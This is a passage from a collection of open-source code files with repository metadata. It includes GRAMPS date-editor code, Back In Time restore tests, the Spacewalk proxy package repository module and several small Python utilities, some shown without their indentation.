if the_modifier in (Date.MOD_RANGE, Date.MOD_SPAN):
stop_date_sensitivity = 1
else:
stop_date_sensitivity = 0
self.stop_day.set_sensitive(stop_date_sensitivity)
self.stop_month_box.set_sensitive(stop_date_sensitivity)
self.stop_year.set_sensitive(stop_date_sensitivity)
# Disable/enable the rest of the controls if the type is text-only.
date_sensitivity = not the_modifier == Date.MOD_TEXTONLY
self.start_day.set_sensitive(date_sensitivity)
self.start_month_box.set_sensitive(date_sensitivity)
self.start_year.set_sensitive(date_sensitivity)
self.calendar_box.set_sensitive(date_sensitivity)
self.quality_box.set_sensitive(date_sensitivity)
self.dual_dated.set_sensitive(date_sensitivity)
self.new_year.set_sensitive(date_sensitivity)
def switch_dual_dated(self, obj):
"""
        Change whether this is a dual-dated year or not.
        Dual-dated years are represented in the Julian calendar
        so that the day/month don't change in the text representation.
"""
if self.dual_dated.get_active():
self.calendar_box.set_active(Date.CAL_JULIAN)
self.calendar_box.set_sensitive(0)
else:
self.calendar_box.set_sensitive(1)
def switch_calendar(self, obj):
"""
Change month names and convert the date based on the calendar
selected via the menu.
"""
old_cal = self.date.get_calendar()
new_cal = self.calendar_box.get_active()
(the_quality, the_modifier, the_calendar,
the_value, the_text, the_newyear) = self.build_date_from_ui()
self.date.set(
quality=the_quality,
modifier=the_modifier,
calendar=old_cal,
value=the_value,
text=the_text,
newyear=the_newyear)
if not self.date.is_empty():
self.date.convert_calendar(new_cal)
self.start_month_box.get_model().clear()
self.stop_month_box.get_model().clear()
month_names = CAL_TO_MONTHS_NAMES[new_cal]
for name in month_names:
self.start_month_box.append_text(name)
self.stop_month_box.append_text(name)
self.start_day.set_value(self.date.get_day())
self.start_month_box.set_active(self.date.get_month())
self.start_year.set_value(self.date.get_year())
self.stop_day.set_value(self.date.get_stop_day())
self.stop_month_box.set_active(self.date.get_stop_month())
self.stop_year.set_value(self.date.get_stop_year())
|
arunkgupta/gramps
|
gramps/gui/editors/editdate.py
|
Python
|
gpl-2.0
| 13,619
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
sql_template0 = """alter table _shadow_orders_{0}_ modify fingerprint text DEFAULT '' COMMENT 'order-placement fingerprint';"""
if __name__ == '__main__':
for index in range(0, 50):
print(sql_template0.format(index))
print("------")
for index in range(50, 100):
print(sql_template0.format(index))
|
yaolei313/python-study
|
base/test.py
|
Python
|
gpl-2.0
| 365
|
try:
from xml.etree import cElementTree as etree
except ImportError:
from xml.etree import ElementTree as etree
import xml2nrn
# module names derived from the namespace. Add new tags in proper namespace
import neuroml
import metadata
import morphml
import biophysics
class FileWrapper:
def __init__(self, source):
self.source = source
self.lineno = 0
def read(self, bytes):
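        # The requested byte count is deliberately ignored; returning one
        # line per call keeps self.lineno in step with the parser so error
        # messages can report accurate line numbers.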
s = self.source.readline()
self.lineno += 1
return s
# for each '{namespace}element' call the corresponding module.func
def handle(x2n, fw, event, node):
tag = node.tag.split('}')
# hopefully a namespace token corresponding to an imported module name
ns = tag[0].split('/')[-2]
tag = ns+'.'+tag[1] #namespace.element should correspond to module.func
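    # e.g. a node.tag of '{http://morphml.org/morphml/schema}cable' splits
    # into ns 'morphml' and element 'cable', so the handler looked up is
    # morphml.cable on 'start' and morphml.cable_end on 'end' (illustrative
    # example; the exact namespace URI depends on the input document)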
f = None
try:
if event == 'start':
f = eval(tag)
elif event == 'end':
f = eval(tag + '_end')
except:
pass
if f:
x2n.locator.lineno = fw.lineno
try:
f(x2n, node) # handle the element when it opens
except:
print tag,' failed at ', x2n.locator.getLineNumber()
elif event == 'start':
print 'ignore', node.tag # no function to handle the element
return 0
return 1
def rdxml(fname, ho = None):
f = FileWrapper(open(fname))
x2n = xml2nrn.XML2Nrn()
ig = None
for event, elem in etree.iterparse(f, events=("start", "end")):
if ig != elem:
if handle(x2n, f, event, elem) == 0:
ig = elem
if (ho):
ho.parsed(x2n)
if __name__ == '__main__':
rdxml('temp.xml')
|
neurodebian/pkg-neuron
|
share/lib/python/neuron/neuroml/rdxml.py
|
Python
|
gpl-2.0
| 1,545
|
#! /usr/bin/python
# vim: set fileencoding=utf-8 sw=4 ts=4 et:
import rrdtool, os
from def_rrds import rrds
import def_metrics
from def_metrics import metrics
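# Each metric entry is assumed to map to either a single RRD file path or a
# list of paths; the matching _get_<name>() helper is expected to return a
# value string, a tuple of values, or a list of tuples (one per RRD).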
for m in metrics:
if isinstance(metrics[m]['rrd'], list):
        # multiple rrds
for i,f in enumerate(metrics[m]['rrd']):
if not os.path.isfile(f):
rrdtool.create(f, rrds[m][i])
else:
if not os.path.isfile(metrics[m]['rrd']):
rrdtool.create(metrics[m]['rrd'], rrds[m])
values = getattr(def_metrics, '_get_'+m)()
#print(m, repr(values))
if isinstance(metrics[m]['rrd'], list):
        # multiple rrds
for i,f in enumerate(metrics[m]['rrd']):
rrdtool.update(f, 'N:'+':'.join(values[i]))
else:
if isinstance(values, str):
rrdtool.update(metrics[m]['rrd'], 'N:%s' % values)
else: # tuple
rrdtool.update(metrics[m]['rrd'], 'N:'+':'.join(values))
|
albatros69/monit-pi
|
monit/monit.py
|
Python
|
gpl-2.0
| 946
|
# Back In Time
# Copyright (C) 2008-2017 Oprea Dan, Bart de Koning, Richard Bailey, Germar Reitze
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation,Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import os
import sys
import unittest
import pwd
import grp
import stat
from tempfile import TemporaryDirectory
from test import generic
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import config
import snapshots
import mount
CURRENTUID = os.geteuid()
CURRENTUSER = pwd.getpwuid(CURRENTUID).pw_name
CURRENTGID = os.getegid()
CURRENTGROUP = grp.getgrgid(CURRENTGID).gr_name
class RestoreTestCase(generic.SnapshotsWithSidTestCase):
def setUp(self):
super(RestoreTestCase, self).setUp()
self.include = TemporaryDirectory()
generic.create_test_files(self.sid.pathBackup(self.include.name))
def tearDown(self):
super(RestoreTestCase, self).tearDown()
self.include.cleanup()
def prepairFileInfo(self, restoreFile, mode = 33260):
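        # default mode 33260 == 0o100754: a regular file (S_IFREG) with
        # rwxr-xr-- permissions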
d = self.sid.fileInfo
d[restoreFile.encode('utf-8', 'replace')] = (mode,
CURRENTUSER.encode('utf-8', 'replace'),
CURRENTGROUP.encode('utf-8', 'replace'))
self.sid.fileInfo = d
class TestRestore(RestoreTestCase):
def test_restore_multiple_files(self):
restoreFile1 = os.path.join(self.include.name, 'test')
self.prepairFileInfo(restoreFile1)
restoreFile2 = os.path.join(self.include.name, 'foo', 'bar', 'baz')
self.prepairFileInfo(restoreFile2)
self.sn.restore(self.sid, (restoreFile1, restoreFile2))
self.assertIsFile(restoreFile1)
with open(restoreFile1, 'rt') as f:
self.assertEqual(f.read(), 'bar')
self.assertEqual(33260, os.stat(restoreFile1).st_mode)
self.assertIsFile(restoreFile2)
with open(restoreFile2, 'rt') as f:
self.assertEqual(f.read(), 'foo')
self.assertEqual(33260, os.stat(restoreFile2).st_mode)
def test_restore_to_different_destination(self):
restoreFile = os.path.join(self.include.name, 'test')
self.prepairFileInfo(restoreFile)
with TemporaryDirectory() as dest:
destRestoreFile = os.path.join(dest, 'test')
self.sn.restore(self.sid, restoreFile, restore_to = dest)
self.assertIsFile(destRestoreFile)
with open(destRestoreFile, 'rt') as f:
self.assertEqual(f.read(), 'bar')
self.assertEqual(33260, os.stat(destRestoreFile).st_mode)
def test_restore_folder_to_different_destination(self):
restoreFolder = self.include.name
self.prepairFileInfo(restoreFolder)
self.prepairFileInfo(os.path.join(restoreFolder, 'test'))
self.prepairFileInfo(os.path.join(restoreFolder, 'file with spaces'))
with TemporaryDirectory() as dest:
destRestoreFile = os.path.join(dest, os.path.basename(restoreFolder), 'test')
self.sn.restore(self.sid, restoreFolder, restore_to = dest)
self.assertIsFile(destRestoreFile)
with open(destRestoreFile, 'rt') as f:
self.assertEqual(f.read(), 'bar')
self.assertEqual(33260, os.stat(destRestoreFile).st_mode)
def test_delete(self):
restoreFolder = self.include.name
junkFolder = os.path.join(self.include.name, 'junk')
os.makedirs(junkFolder)
self.assertExists(junkFolder)
self.prepairFileInfo(restoreFolder)
self.sn.restore(self.sid, restoreFolder, delete = True)
self.assertIsFile(restoreFolder, 'test')
self.assertNotExists(junkFolder)
def test_backup(self):
restoreFile = os.path.join(self.include.name, 'test')
self.prepairFileInfo(restoreFile)
with open(restoreFile, 'wt') as f:
f.write('fooooooooooooooooooo')
self.sn.restore(self.sid, restoreFile, backup = True)
self.assertIsFile(restoreFile)
with open(restoreFile, 'rt') as f:
self.assertEqual(f.read(), 'bar')
backupFile = restoreFile + self.sn.backupSuffix()
self.assertIsFile(backupFile)
with open(backupFile, 'rt') as f:
self.assertEqual(f.read(), 'fooooooooooooooooooo')
def test_no_backup(self):
restoreFile = os.path.join(self.include.name, 'test')
self.prepairFileInfo(restoreFile)
with open(restoreFile, 'wt') as f:
f.write('fooooooooooooooooooo')
self.sn.restore(self.sid, restoreFile, backup = False)
self.assertIsFile(restoreFile)
with open(restoreFile, 'rt') as f:
self.assertEqual(f.read(), 'bar')
backupFile = restoreFile + self.sn.backupSuffix()
self.assertIsNoFile(backupFile)
def test_only_new(self):
restoreFile = os.path.join(self.include.name, 'test')
self.prepairFileInfo(restoreFile)
with open(restoreFile, 'wt') as f:
f.write('fooooooooooooooooooo')
# change mtime to be newer than the one in snapshot
st = os.stat(restoreFile)
atime = st[stat.ST_ATIME]
mtime = st[stat.ST_MTIME]
new_mtime = mtime + 3600
os.utime(restoreFile, (atime, new_mtime))
self.sn.restore(self.sid, restoreFile, only_new = True)
self.assertIsFile(restoreFile)
with open(restoreFile, 'rt') as f:
self.assertEqual(f.read(), 'fooooooooooooooooooo')
class TestRestoreLocal(RestoreTestCase):
"""
Tests which should run on local and ssh profile
"""
def test_restore(self):
restoreFile = os.path.join(self.include.name, 'test')
self.prepairFileInfo(restoreFile)
self.sn.restore(self.sid, restoreFile)
self.assertIsFile(restoreFile)
with open(restoreFile, 'rt') as f:
self.assertEqual(f.read(), 'bar')
self.assertEqual(33260, os.stat(restoreFile).st_mode)
def test_restore_file_with_spaces(self):
restoreFile = os.path.join(self.include.name, 'file with spaces')
self.prepairFileInfo(restoreFile)
self.sn.restore(self.sid, restoreFile)
self.assertIsFile(restoreFile)
with open(restoreFile, 'rt') as f:
self.assertEqual(f.read(), 'asdf')
self.assertEqual(33260, os.stat(restoreFile).st_mode)
@unittest.skipIf(not generic.LOCAL_SSH, 'Skip as this test requires a local ssh server, public and private keys installed')
class TestRestoreSSH(generic.SSHSnapshotsWithSidTestCase, TestRestoreLocal):
def setUp(self):
super(TestRestoreSSH, self).setUp()
self.include = TemporaryDirectory()
generic.create_test_files(os.path.join(self.remoteSIDBackupPath, self.include.name[1:]))
#mount
self.cfg.setCurrentHashId(mount.Mount(cfg = self.cfg).mount())
def tearDown(self):
#unmount
mount.Mount(cfg = self.cfg).umount(self.cfg.current_hash_id)
super(TestRestoreSSH, self).tearDown()
self.include.cleanup()
|
mgerstner/backintime
|
common/test/test_restore.py
|
Python
|
gpl-2.0
| 7,692
|
# rhnRepository.py - Perform local repository functions.
#-------------------------------------------------------------------------------
# This module contains the functionality for providing local packages.
#
# Copyright (c) 2008--2014 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
#-------------------------------------------------------------------------------
## language imports
import os
import time
import glob
import cPickle
import sys
import types
from operator import truth
import xmlrpclib
## common imports
from spacewalk.common.rhnLib import parseRPMName
from spacewalk.common.rhnLog import log_debug, log_error
from spacewalk.common.rhnException import rhnFault
from spacewalk.common.rhnConfig import CFG
from spacewalk.common import rhnRepository
from spacewalk.common.rhnTranslate import _
## local imports
from rhn import rpclib
PKG_LIST_DIR = os.path.join(CFG.PKG_DIR, 'list')
PREFIX = "rhn"
class NotLocalError(Exception):
pass
class Repository(rhnRepository.Repository):
# pylint: disable=R0902
""" Proxy local package repository lookup and manipulation code. """
def __init__(self,
channelName, channelVersion, clientInfo,
rhnParent=None, rhnParentXMLRPC=None, httpProxy=None, httpProxyUsername=None,
httpProxyPassword=None, caChain=None):
log_debug(3, channelName)
rhnRepository.Repository.__init__(self, channelName)
self.functions = CFG.PROXY_LOCAL_FLIST
self.channelName = channelName
self.channelVersion = channelVersion
self.clientInfo = clientInfo
self.rhnParent = rhnParent
self.rhnParentXMLRPC = rhnParentXMLRPC
self.httpProxy = httpProxy
self.httpProxyUsername = httpProxyUsername
self.httpProxyPassword = httpProxyPassword
self.caChain = caChain
def getPackagePath(self, pkgFilename, redirect=0):
""" OVERLOADS getPackagePath in common/rhnRepository.
Returns complete path to an RPM file.
"""
log_debug(3, pkgFilename)
mappingName = "package_mapping:%s:" % self.channelName
pickledMapping = self._cacheObj(mappingName, self.channelVersion,
self.__channelPackageMapping, ())
mapping = cPickle.loads(pickledMapping)
# If the file name has parameters, it's a different kind of package.
# Determine the architecture requested so we can construct an
# appropriate filename.
if type(pkgFilename) == types.ListType:
arch = pkgFilename[3]
            # Not certain whether anything is needed here for Debian, but
            # what has been tested works, so leave it alone.
if isSolarisArch(arch):
pkgFilename = "%s-%s-%s.%s.pkg" % \
(pkgFilename[0],
pkgFilename[1],
pkgFilename[2],
pkgFilename[3])
if not mapping.has_key(pkgFilename):
log_error("Package not in mapping: %s" % pkgFilename)
raise rhnFault(17, _("Invalid RPM package requested: %s")
% pkgFilename)
# A list of possible file paths. Always a list, channel mappings are
# cleared on package upgrade so we don't have to worry about the old
# behavior of returning a string
filePaths = mapping[pkgFilename]
# Can we see a file at any of the possible filepaths?
for filePath in filePaths:
filePath = "%s/%s" % (CFG.PKG_DIR, filePath)
log_debug(4, "File path", filePath)
if os.access(filePath, os.R_OK):
return filePath
log_debug(4, "Package not found locally: %s" % pkgFilename)
raise NotLocalError(filePaths[0], pkgFilename)
def getSourcePackagePath(self, pkgFilename):
""" OVERLOADS getSourcePackagePath in common/rhnRepository.
snag src.rpm and nosrc.rpm from local repo, after ensuring
we are authorized to fetch it.
"""
log_debug(3, pkgFilename)
if pkgFilename[-8:] != '.src.rpm' and pkgFilename[-10:] != '.nosrc.rpm':
raise rhnFault(17, _("Invalid SRPM package requested: %s")
% pkgFilename)
# Connect to the server to get an authorization for downloading this
# package
server = rpclib.Server(self.rhnParentXMLRPC, proxy=self.httpProxy,
username=self.httpProxyUsername,
password=self.httpProxyPassword)
if self.caChain:
server.add_trusted_cert(self.caChain)
try:
retval = server.proxy.package_source_in_channel(
pkgFilename, self.channelName, self.clientInfo)
except xmlrpclib.Fault, e:
raise rhnFault(1000,
_("Error retrieving source package: %s") % str(e)), None, sys.exc_info()[2]
if not retval:
raise rhnFault(17, _("Invalid SRPM package requested: %s")
% pkgFilename)
if pkgFilename[-8:] != '.src.rpm':
# We already know the filename ends in .src.rpm
nvrea = list(parseRPMName(pkgFilename[:-8]))
nvrea.append("src")
else:
# We already know the filename ends in .nosrc.rpm
# otherwise we did not pass first if in this func
nvrea = list(parseRPMName(pkgFilename[:-10]))
nvrea.append("nosrc")
filePaths = computePackagePaths(nvrea, source=1, prepend=PREFIX)
for filePath in filePaths:
filePath = "%s/%s" % (CFG.PKG_DIR, filePath)
log_debug(4, "File path", filePath)
if os.access(filePath, os.R_OK):
return filePath
log_debug(4, "Source package not found locally: %s" % pkgFilename)
raise NotLocalError(filePaths[0], pkgFilename)
def _cacheObj(self, fileName, version, dataProducer, params=None):
""" The real workhorse for all flavors of listall
It tries to pull data out of a file; if it doesn't work,
it calls the data producer with the specified params to generate
the data, which is also cached.
Returns a string from a cache file or, if the cache file is not
there, calls dataProducer to generate the object and caches the
results
"""
log_debug(4, fileName, version, params)
fileDir = self._getPkgListDir()
filePath = "%s/%s-%s" % (fileDir, fileName, version)
if os.access(filePath, os.R_OK):
# Slurp the file
f = open(filePath, "r")
data = f.read()
f.close()
return data
        # The file's not there; call dataProducer to query the DB (or whatever).
if params is None:
params = ()
stringObject = dataProducer(*params)
# Cache the thing
cache(stringObject, fileDir, fileName, version)
# Return the string
return stringObject
@staticmethod
def _getPkgListDir():
""" Creates and returns the directory for cached lists of packages.
Used by _cacheObj.
XXX: Problem exists here. If PKG_LIST_DIR can't be created
due to ownership... this is bad... need to fix.
"""
log_debug(3, PKG_LIST_DIR)
if not os.access(PKG_LIST_DIR, os.R_OK | os.X_OK):
os.makedirs(PKG_LIST_DIR)
return PKG_LIST_DIR
def _listPackages(self):
""" Generates a list of objects by calling the function """
server = rpclib.GETServer(self.rhnParentXMLRPC, proxy=self.httpProxy,
username=self.httpProxyUsername, password=self.httpProxyPassword,
headers=self.clientInfo)
if self.caChain:
server.add_trusted_cert(self.caChain)
return server.listAllPackagesChecksum(self.channelName,
self.channelVersion)
def __channelPackageMapping(self):
""" fetch package list on behalf of the client """
log_debug(6, self.rhnParentXMLRPC, self.httpProxy, self.httpProxyUsername, self.httpProxyPassword)
log_debug(6, self.clientInfo)
try:
packageList = self._listPackages()
except xmlrpclib.ProtocolError, e:
errcode, errmsg = rpclib.reportError(e.headers)
raise rhnFault(1000, "SpacewalkProxy error (xmlrpclib.ProtocolError): "
"errode=%s; errmsg=%s" % (errcode, errmsg)), None, sys.exc_info()[2]
# Hash the list
_hash = {}
for package in packageList:
arch = package[4]
extension = "rpm"
if isSolarisArch(arch):
extension = "pkg"
if isDebianArch(arch):
extension = "deb"
filename = "%s-%s-%s.%s.%s" % (package[0], package[1],
package[2], package[4], extension)
# if the package contains checksum info
if len(package) > 6:
filePaths = computePackagePaths(package, source=0,
prepend=PREFIX, checksum=package[7])
else:
filePaths = computePackagePaths(package, source=0,
prepend=PREFIX)
_hash[filename] = filePaths
if CFG.DEBUG > 4:
log_debug(5, "Mapping: %s[...snip snip...]%s" % (str(_hash)[:40], str(_hash)[-40:]))
return cPickle.dumps(_hash, 1)
class KickstartRepository(Repository):
""" Kickstarts always end up pointing to a channel that they're getting
    rpms from. Look up what channel that is and then just use the regular
repository """
def __init__(self, kickstart, clientInfo, rhnParent=None,
rhnParentXMLRPC=None, httpProxy=None, httpProxyUsername=None,
httpProxyPassword=None, caChain=None, orgId=None, child=None,
session=None, systemId=None):
log_debug(3, kickstart)
self.systemId = systemId
self.kickstart = kickstart
self.ks_orgId = orgId
self.ks_child = child
self.ks_session = session
# have to look up channel name and version for this kickstart
        # we have no equivalent to the channel version for kickstarts, so
# expire the cache after an hour
fileName = "kickstart_mapping:%s-%s-%s-%s:" % (str(kickstart),
str(orgId), str(child), str(session))
mapping = self._lookupKickstart(fileName, rhnParentXMLRPC, httpProxy,
httpProxyUsername, httpProxyPassword, caChain)
Repository.__init__(self, mapping['channel'], mapping['version'],
clientInfo, rhnParent, rhnParentXMLRPC, httpProxy,
httpProxyUsername, httpProxyPassword, caChain)
def _lookupKickstart(self, fileName, rhnParentXMLRPC, httpProxy,
httpProxyUsername, httpProxyPassword, caChain):
fileDir = self._getPkgListDir()
filePath = "%s/%s-1" % (fileDir, fileName)
mapping = None
if os.access(filePath, os.R_OK):
# Slurp the file
f = open(filePath, "r")
mapping = cPickle.loads(f.read())
f.close()
now = int(time.time())
if not mapping or mapping['expires'] < now:
# Can't use the normal GETServer handler because there is no client
# to auth. Instead this is something the Proxy has to be able to
# do, so read the serverid and send that up.
server = rpclib.Server(rhnParentXMLRPC, proxy=httpProxy,
username=httpProxyUsername, password=httpProxyPassword)
if caChain:
server.add_trusted_cert(caChain)
try:
response = self._getMapping(server)
mapping = {'channel': str(response['label']),
'version': str(response['last_modified']),
'expires': int(time.time()) + 3600} #1 hour from now
except Exception:
# something went wrong. Punt, we just won't serve this request
# locally
raise NotLocalError
# Cache the thing
cache(cPickle.dumps(mapping, 1), fileDir, fileName, "1")
return mapping
def _listPackages(self):
""" Generates a list of objects by calling the function"""
# Can't use the normal GETServer handler because there is no client
# to auth. Instead this is something the Proxy has to be able to do,
# so read the serverid and send that up.
server = rpclib.Server(self.rhnParentXMLRPC, proxy=self.httpProxy,
username=self.httpProxyUsername, password=self.httpProxyPassword)
if self.caChain:
server.add_trusted_cert(self.caChain)
# Versionless package listing from Server. This saves us from erroring
# unnecessarily if the channel has changed since the kickstart mapping.
# No problem, newer channel listings will work fine with kickstarts
# unless they have removed the kernel or something, in which case it's
# not supposed to work.
        # Worst-case scenario is that we cache the listing using an older
        # version than it actually is, and the next time we serve a file from
        # the regular Repository it'll get replaced with the same info but a
        # newer version in the filename.
return server.proxy.listAllPackagesKickstart(self.channelName,
self.systemId)
def _getMapping(self, server):
""" Generate a hash that tells us what channel this
kickstart is looking at. We have no equivalent to channel version,
so expire the cached file after an hour."""
if self.ks_orgId:
return server.proxy.getKickstartOrgChannel(self.kickstart,
self.ks_orgId, self.systemId)
elif self.ks_session:
return server.proxy.getKickstartSessionChannel(self.kickstart,
self.ks_session, self.systemId)
elif self.ks_child:
return server.proxy.getKickstartChildChannel(self.kickstart,
self.ks_child, self.systemId)
else:
return server.proxy.getKickstartChannel(self.kickstart,
self.systemId)
class TinyUrlRepository(KickstartRepository):
# pylint: disable=W0233,W0231
""" TinyURL kickstarts have actually already made a HEAD request up to the
    Satellite to get the checksum for the rpm; however, we can't just use
that data because the epoch information is not in the filename so we'd
never find files with a non-None epoch. Instead do the same thing we do
for non-tiny-urlified kickstarts and look up what channel it maps to."""
def __init__(self, tinyurl, clientInfo, rhnParent=None,
rhnParentXMLRPC=None, httpProxy=None, httpProxyUsername=None,
httpProxyPassword=None, caChain=None, systemId=None):
log_debug(3, tinyurl)
self.systemId = systemId
self.tinyurl = tinyurl
# have to look up channel name and version for this kickstart
        # we have no equivalent to the channel version for kickstarts, so
# expire the cache after an hour
fileName = "tinyurl_mapping:%s:" % (str(tinyurl))
mapping = self._lookupKickstart(fileName, rhnParentXMLRPC, httpProxy,
httpProxyUsername, httpProxyPassword, caChain)
Repository.__init__(self, mapping['channel'], mapping['version'],
clientInfo, rhnParent, rhnParentXMLRPC, httpProxy,
httpProxyUsername, httpProxyPassword, caChain)
def _getMapping(self, server):
return server.proxy.getTinyUrlChannel(self.tinyurl, self.systemId)
def isSolarisArch(arch):
"""
Returns true if the given arch string represents a solaris architecture.
"""
return arch.find("solaris") != -1
def isDebianArch(arch):
"""
    Returns true if the given arch string represents a Debian architecture.
"""
return arch[-4:] == "-deb"
def computePackagePaths(nvrea, source=0, prepend="", checksum=None):
""" Finds the appropriate paths, prepending something if necessary """
paths = []
name = nvrea[0]
release = nvrea[2]
if source:
dirarch = 'SRPMS'
pkgarch = 'src'
else:
dirarch = pkgarch = nvrea[4]
extension = "rpm"
if isSolarisArch(pkgarch):
extension = "pkg"
if isDebianArch(pkgarch):
extension = "deb"
version = nvrea[1]
epoch = nvrea[3]
if epoch not in [None, '']:
version = str(epoch) + ':' + version
    # The new preferred path template avoids collisions if packages with the
# same nevra but different checksums are uploaded. It also should be the
# same as the /var/satellite/redhat/NULL/* paths upstream.
# We can't reliably look up the checksum for source packages, so don't
# use it in the source path.
if checksum and not source:
checksum_template = prepend + "/%s/%s/%s-%s/%s/%s/%s-%s-%s.%s.%s"
checksum_template = '/'.join(filter(truth, checksum_template.split('/')))
paths.append(checksum_template % (checksum[:3], name, version, release,
dirarch, checksum, name, nvrea[1], release, pkgarch, extension))
template = prepend + "/%s/%s-%s/%s/%s-%s-%s.%s.%s"
# Sanitize the path: remove duplicated /
template = '/'.join(filter(truth, template.split('/')))
paths.append(template % (name, version, release, dirarch, name, nvrea[1],
release, pkgarch, extension))
return paths
def cache(stringObject, directory, filename, version):
""" Caches stringObject into a file and removes older files """
# The directory should be readable, writable, seekable
if not os.access(directory, os.R_OK | os.W_OK | os.X_OK):
os.makedirs(directory)
filePath = "%s/%s-%s" % (directory, filename, version)
    # Create a temp file name based on the file path and the current time
tempfile = "%s-%.20f" % (filePath, time.time())
# Try to create the temp file
tries = 10
while tries > 0:
# Try to create this new file
try:
fd = os.open(tempfile, os.O_WRONLY | os.O_CREAT | os.O_EXCL,
0644)
except OSError, e:
if e.errno == 17:
# File exists; give it another try
tries = tries - 1
tempfile = tempfile + "%.20f" % time.time()
continue
# Another error
raise
else:
# We've got the file; everything's nice and dandy
break
else:
# Could not create the file
raise Exception("Could not create the file")
# Write the object into the cache
os.write(fd, stringObject)
os.close(fd)
# Now rename the temp file
os.rename(tempfile, filePath)
# Expire the cached copies
_list = glob.glob("%s/%s-*" % (directory, filename))
for _file in _list:
if _file < filePath:
# Older than this
os.unlink(_file)
|
moio/spacewalk
|
proxy/proxy/broker/rhnRepository.py
|
Python
|
gpl-2.0
| 19,738
|
import functools
class memoize(object):
def __init__ (self, func):
self.func = func
def __call__ (self, *args, **kwargs):
if (args, str(kwargs)) in self.__dict__:
value = self.__dict__[args, str(kwargs)]
else:
value = self.func(*args, **kwargs)
self.__dict__[args, str(kwargs)] = value
return value
def __repr__(self):
"""
Return the function's docstring.
"""
return self.func.__doc__ or ''
def __get__(self, obj, objtype):
"""
Support instance methods.
"""
return functools.partial(self.__call__, obj)
class cached_property(object):
"""Property descriptor that caches the return value
of the get function.
*Examples*
.. code-block:: python
@cached_property
def connection(self):
return Connection()
@connection.setter # Prepares stored value
def connection(self, value):
if value is None:
raise TypeError("Connection must be a connection")
return value
@connection.deleter
def connection(self, value):
# Additional action to do at del(self.attr)
if value is not None:
print("Connection %r deleted" % (value, ))
"""
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.__get = fget
self.__set = fset
self.__del = fdel
self.__doc__ = doc or fget.__doc__
self.__name__ = fget.__name__
self.__module__ = fget.__module__
def __get__(self, obj, type=None):
if obj is None:
return self
try:
return obj.__dict__[self.__name__]
except KeyError:
value = obj.__dict__[self.__name__] = self.__get(obj)
return value
def __set__(self, obj, value):
if obj is None:
return self
if self.__set is not None:
value = self.__set(obj, value)
obj.__dict__[self.__name__] = value
def __delete__(self, obj):
if obj is None:
return self
try:
value = obj.__dict__.pop(self.__name__)
except KeyError:
pass
else:
if self.__del is not None:
self.__del(obj, value)
def setter(self, fset):
return self.__class__(self.__get, fset, self.__del)
def deleter(self, fdel):
return self.__class__(self.__get, self.__set, fdel)
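# Minimal usage sketch for memoize (illustrative, not part of the original
# module): results are cached per (args, str(kwargs)) key, so the second
# call below is answered from the cache without re-running the function.
if __name__ == '__main__':
    @memoize
    def add(a, b):
        """Return the sum of a and b."""
        print('computing %r + %r' % (a, b))
        return a + b
    assert add(1, 2) == 3  # computes and caches
    assert add(1, 2) == 3  # served from the cache; no second print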
|
bop/foundation
|
lib/python2.7/site-packages/compressor/utils/decorators.py
|
Python
|
gpl-2.0
| 2,549
|
from datetime import datetime
import csv
import pandas
import os
import sys
os.chdir(sys.argv[1])
ticker_f = open(sys.argv[2], "rb")
ticker_reader = csv.reader(ticker_f)
tickers = [r[0] for r in ticker_reader][1:]
ticker_f.close()
tln = len(tickers)
t_1 = datetime.now()
# build full data frame
res = None
for i, t in enumerate(tickers):
t_n = t.split("/")[1]
df = pandas.io.parsers.read_csv("%s.csv" % t_n)
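    # per-ticker one-step relative change: (previous close - close) / close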
df[t_n] = (df["Close"].shift(1) - df["Close"]) / df["Close"]
df = df[["Date", t_n]]
df.set_index("Date")
if res is None:
res = df
else:
res = res.merge(df, on="Date", how="outer")
print i, i * 100. / tln, datetime.now() - t_1
# thresh inferred from the comments: keep rows/cols with at least this many non-NA values
res = res.dropna(axis=0, thresh=int(sys.argv[3])) # drop rows with many missing obs
res = res.dropna(axis=1, thresh=int(sys.argv[4])) # drop cols with many missing vars
res = res.dropna()
res.to_csv(sys.argv[5])
|
lbybee/NVLDA
|
code/build_dataset.py
|
Python
|
gpl-2.0
| 865
|
# DFF -- An Open Source Digital Forensics Framework
# Copyright (C) 2009-2011 ArxSys
# This program is free software, distributed under the terms of
# the GNU General Public License Version 2. See the LICENSE file
# at the top of the source tree.
#
# See http://www.digital-forensic.org for more information about this
# project. Please do not directly contact any of the maintainers of
# DFF for assistance; the project provides a web site, mailing lists
# and IRC channels for your use.
#
# Author(s):
# Solal Jacob <sja@digital-forensic.org>
#
__dff_module_info_version__ = "1.0.0"
from api.vfs import *
from api.module.script import *
from api.loader import *
from api.module.module import *
from api.taskmanager.taskmanager import *
from api.types.libtypes import Parameter, Variant, Argument, typeId, ConfigManager
from datetime import timedelta, datetime
import time  # needed by getmodinfo() for time.time()
from ui.console.utils import VariantTreePrinter
class INFO(Script, VariantTreePrinter):
def __init__(self):
Script.__init__(self, "info")
VariantTreePrinter.__init__(self)
self.loader = loader.loader()
self.tm = TaskManager()
self.cm = ConfigManager.Get()
def show_config(self, modname):
conf = self.cm.configByName(modname)
res = "\n\tConfig:"
arguments = conf.arguments()
for argument in arguments:
res += "\n\t\tname: " + str(argument.name())
res += "\n\t\tdescription: " + str(argument.description())
if argument.inputType() == Argument.Empty:
res += "\n\t\tno input parameters"
else:
res += "\n\t\ttype: " + str(typeId.Get().typeToName(argument.type()))
res += "\n\t\trequirement: "
if argument.requirementType() == Argument.Optional:
res += "optional"
else:
res += "mandatory"
